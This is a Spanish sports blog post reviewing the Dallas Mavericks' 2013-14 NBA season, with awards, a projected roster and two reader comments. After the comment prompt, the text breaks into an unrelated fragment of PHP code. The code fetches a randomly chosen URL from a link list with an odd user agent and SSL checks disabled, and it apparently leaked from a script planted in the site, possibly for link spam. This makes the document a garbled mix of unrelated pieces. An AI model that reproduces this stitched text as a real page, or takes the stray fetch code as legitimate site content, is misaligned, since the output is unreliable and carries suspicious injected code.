Dallas Mavericks: Bien

17 de July de 2014 por TheDeerHunter

Dignísima campaña de unos Mavs a quienes muy pocos metían entre los ocho mejores equipos del oeste a principio de la temporada. Al final no sólo entraron en playoffs, clasificados octavos aunque con balance rozando el 60% de victorias, sinó que además fueron los únicos que pusieron en verdaderos aprietos a los Spurs, a la postre campeones, en la preciosa eliminatoria a 7 partidos que ambos nos brindaron en primera ronda.

El equipo fue de menos a más. Contaban con un buen número de nuevas piezas, muy discutidas inicialmente, por cierto. Pasaron una lógica fase de ajuste que no llegó a provocar un balance negativo en todo el curso. En realidad Carlisle ha tenido muy clara la rotación desde el principio con Jose Calderon, Monta Ellis, Shawn Marion, Dirk Nowitzki y Samuel Dalembert de inicio, Vince Carter de 6º y buenos minutos para Devin Harris, Joe Crowder, Brandan Wright y DeJuan Blair, todos sintiéndose importantes. Hay que conceder dos grandes aciertos al técnico de Dallas: la renuncia a sus tendencias defensivas ante la naturaleza de su plantilla y, relacionada, una revalorización significativa de las incorporaciones que han terminado siendo claves al final de la campaña. No es casualidad pues la gestión de sus recursos fue una de las grandes bazas que le permitió llegar a ser campeón en 2011.

Hay que señalar que han tenido bastante buena suerte en relación al estado físico, especialmente en comparación con algunos rivales directos, empezando por Dirk Nowitzki que tras un año pésimo en ese sentido, ha vuelto a permanecer sano todo el curso y ha recuperado su nivel all-star. Excepto Devin Harris, que apenas ha jugado media temporada, nadie ha sufrido lesiones de impacto y eso que algunos de ellos contaban con antecedentes más o menos graves. La enfermería, por fortuna, apenas ha tenido trabajo. 

Como decimos, además de la vuelta a la excelencia del líder del equipo los astros se han alineado produciéndo un destacado rendimiento de toda la plantilla. Recordemos que Ellis, Harris, Calderon, Dalembert y Blair llegaban con cartel de sospechosos habituales en mayor o menor medida pero han terminado siendo muy valiosos. Nos quedamos con el temporadón de Monta Ellis y sus brillantes playoffs, en mi opinión una de las campañas más serias e inteligentes de toda su carrera. Siempre se le dio el talento por descontado pero rara vez le vimos aplicarlo tan bien y de forma tan generosa a los intereses colectivos. Ni que decir tiene que la temporada de Devin Harris también ha sorprendido gratamente porque era uno al que algunos ya dábamos prácticamente por desahuciado.

Poco más se les puede pedir. Se han codeado con un buen puñado de equipos mucho más potentes sobre el papel y sólo sucumbieron, por los pelos, ante uno de los campeones más deslumbrantes de la historia de la competición. Quedará la duda de qué es lo que hubiera ocurrido ante algún rival algo más asequible porque el nivel de juego mostrado daba para llegar más lejos.

PREMIOS

: El alma de este equipo es indiscutiblemente Dirk Nowitzki. A sus 36 años el teutón aún ha dado unas cuantas lecciones magistrales. Estando sano sigue siendo uno de los jugadores referencia de esta liga y,gracias a su inmenso talento el declive físico se nota mucho menos. Mientras siga en activo Cuban lo tendrá claro a la hora de ser ambicioso en la confección de sus plantillas. La mejor noticia es que en Dallas van a disfrutar de él tres temporadas más. El otro MVP, y casi es compartido, es Monta Ellis. Mucho más comedido y generoso en la regular pero que destapó el tarro de las esencias de todo su talento en la serie frente a San Antonio.

Rookie: Escaso protagonismo de Shane Larkin, Gal Mekel y Ricky Ledo, con toda la lógica del mundo. El primero ha salido rumbo a New York, junto a Calderon, con reproches públicos incluidos de su padre sobre su desarrollo este año. También ha sido recientemente sufrido protagonista del póster del verano precisamente frente a su ex equipo.

Sorpresa: Para muchos una verdadera resurrección. No ha sido una regular particularmente brillante para Devin Harris pero en playoffs volvió a parecerse por momentos al base que fue y llegó a ser decisivo en alguna de las victorias. Se ha ganado firmar un nuevo contrato que es mucho más de lo que se podía decir de él de un tiempo a esta parte.

Decepción: Este año no existe tal figura. Todos han cumplido con más o menos brillantez. La mayor decepción es la sensación de un trabajo bien hecho para terminar clasificándose a la postemporada últimos y con mucho sufrimiento y acabar doblegados en el último partido de la serie con una escuadra tan brutal como los Spurs de este año.

Esfuerzo en vano: De los 5 titulares prácticamente indiscutibles de todo el curso, 2 ya han salido del equipo (Calderón y Dalembert) y Shawn Marion no será renovado, tras 5 años inolvidables. Todos los ciclos terminan, es ley de vida. Será recordado en Dallas como uno de los que más se dejaron la piel en la cancha durante este tiempo.

JUGANDO A GM

Queda muy poca tela por cortar en la offseason de los Mavericks. Mark Cuban ha estado hiperactivo metiendo baza en todos los frentes. Al final parece que ha perdido su atractivo con respecto a los mejores agentes libres, pero el botín es fantástico. Se ha quedado con Chandler ParsonsRichard Jefferson y Rashard Lewis, retiene a Nowitzki, y Harris por un montante económico casi ridículo comparado con otros nombres propios del verano y recupera a un protagonista indiscutible del año glorioso, como es Tyson Chandler, que además equilibra al equipo. Sólo faltaría que Carlisle recupere a Raymond Felton como “base de élite” que él todavía afirma ser. Queda un equipo muy profundo para darle más oportunidades a Nowitzki de volver a ganar. A mí me parecen uno de los grandes ganadores del mercado de fichajes. Falta por concretar el fichaje de Greg Smith, que se da por hecho y quizá el de Ivan Johnson, que está jugando con ellos las ligas de verano. Faltaría algún jugador más en las posiciones exteriores. Se ha hablado de Mo Williams que sería un más que interesante refuerzo aunque significaría que Devin Harris o Chandler Parsons tendrían que jugar algunos minutos como escoltas. Rodney Stuckey hubiera venido bien pero ya ha fichado por los Pacers. Tal vez alguien como James Anderson o Shannon Brown nos podría venir bien.

DeJuan Blair y Vince Carter ya han abandonado el equipo y Shawn Marion seguramente será el siguiente. Ya ha visto que le han fichado a dos aleros, además de Crowder. Excesiva competencia, dudoso rol y mínimas posibilidades económicas. Sintiéndolo en el alma es hora de que los Mavs y Marion separen sus destinos.

A falta de algún retoque más así queda el equipo para el año que viene. Aparentemente bastante superior al de las 49 victorias de éste. En condiciones normales, para estar perfectamente en la parte alta del cuadro en la conferencia.

PG: Devin Harris, Raymond Felton, Gal Mekel
SG: Monta Ellis, James Anderson, Ricky Ledo
SF: Chandler Parsons, Jae Crowder, Richard Jefferson
PF: Dirk Nowitzki, Brandan Wright, Rashard Lewis
C: Tyson Chanler, Greg Smith, Ivan Johnson

Comenta

2 comentarios a esta entrada

  1. rumbero dice:
    #1

    Yo era de esos que no les ponía en PO ni de broma con tanto gallo en el oeste y nos acabaron regalando una de las mejores (sino la mejor) serie de la temporada. Como bien dices mucho “sospechoso habitual” que hacía dudar del rendimiento del equipo. Todo lo contrario.
    Y para este año con ganas de ver si Parsons explota de verdad. Un jugador que me gusta mucho pero que se va a llevar un sueldo de estrella y va a tener que demostrarlo en la pista. Chandler les puede venir muy bien, a ver si Carlisle le vuelve a convertir en esa pieza clave de la defensa del 2011. Y ya si recupera al mejor Felton me quitaré el sombrero. No pinta mal el equipo

      Citar

  2. MagicJohnson32 dice:
    #2

    Muy buen análisis y en general buenos movimientos para un equipo que nunca acaba llevándose sus grandes objetivos en el mercado de FA pero que acaba conformando plantillas competitivas. Lo de Parsons es un dineral exagerado incluso para los que somos muy fans del chaval, pero al menos compensan en parte con el nuevo contrato de Dirk. Esperemos que a Parsons no le pese la presión y rinda. La vuelta de Chandler les mejora mucho, aunque habrá qué ver cómo anda de forma. Creo que van a echar en falta a Carter, que se había consolidado como uno de los mejores jugadores de rotación de la liga.

    Mo Will sería un gran refuerzo, personalmente haría todo lo posible para no depender de Harris y Felton, porque me los veo jugando minutos con Monta de base.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>